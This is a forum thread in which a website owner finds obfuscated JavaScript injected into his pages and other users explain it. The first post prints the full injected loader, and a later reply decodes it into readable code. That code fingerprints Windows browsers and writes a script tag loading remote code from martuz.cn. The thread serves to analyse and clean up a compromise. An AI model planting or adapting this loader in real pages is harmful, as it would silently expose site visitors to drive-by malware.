Weird code on my website

[speedy33417]

I have some weird code that appeared in my websites source code. Not sure if someone hacked into my server or what happened.

 

Here's a the code. How concerned should I be? What does the code do?

 

<script language=javascript><!-- 
(function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})();
--></script>

[ober]

Probably a trojan injected by a hacker.  Delete it and secure  your site.

[speedy33417]

Thanks ober.

 

This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected.

 

If it's a trojan what does it really do? Does steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page  would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done.

 

Thanks for your help.

[ober]

It will actually try to install itself on the client PC.  I got nailed on my personal site when I used some 3rd party code.  Some of my users had their anti-virus software pick it up.

[Ken2k7]

My friend's blog site with something similar. It never affected me though. Hail NOSCRIPT!

[Daniel0]

Well, you could just check the code yourself, no? What you posted is equivalent to the following Javascript:

 

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}

 

Applying some formatting we get:

var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;

if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A")))
{
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

 

The string within the eval() is this:

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

 

So it'll set j if some conditions are true, and it will then execute the Javascript which is hosted on http://martuz.cn/vid/?id=j

 

This is seemingly a "reported attack site".

 

The domain name martuz.cn resolves to 98.124.198.1, but that machine doesn't seem to be up.

[speedy33417]

Thanks all for the help.

 

Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)?

[Daniel0]

You see the very last statement of your code?

eval(bhioa)

 

It's evaluating the contents of the variable bhioa. It's simply a matter of printing that variable to get the plain text code. It's no more than obfuscation. A browser needs HTML, CSS and Javascript in plain text, so it's impossible to decrypt it and/or hide it.

[PugJr]

Just for future reference on secruity, how did your site obtain that in your source code? You can't add your own script into source code with like XSS or mysql injections right or anything of that sort?

[jackpf]

Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool

 

And are you sure it's not your host? Is it actually in the file, if you open the file to edit it, not just on your source code? Some hosts automatically append scripts to all sites, like stat counters and stuff.

 

But yeah, try something like this:

document.write(unescape(bhioa));

[waynew]

Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool

 

Sorry mate. You need a hacker name such as RIPPER or SLASHER to do that.

[jackpf]

Ok, my new alias is "jackpf the ripper".

 

That would be pretty fun though...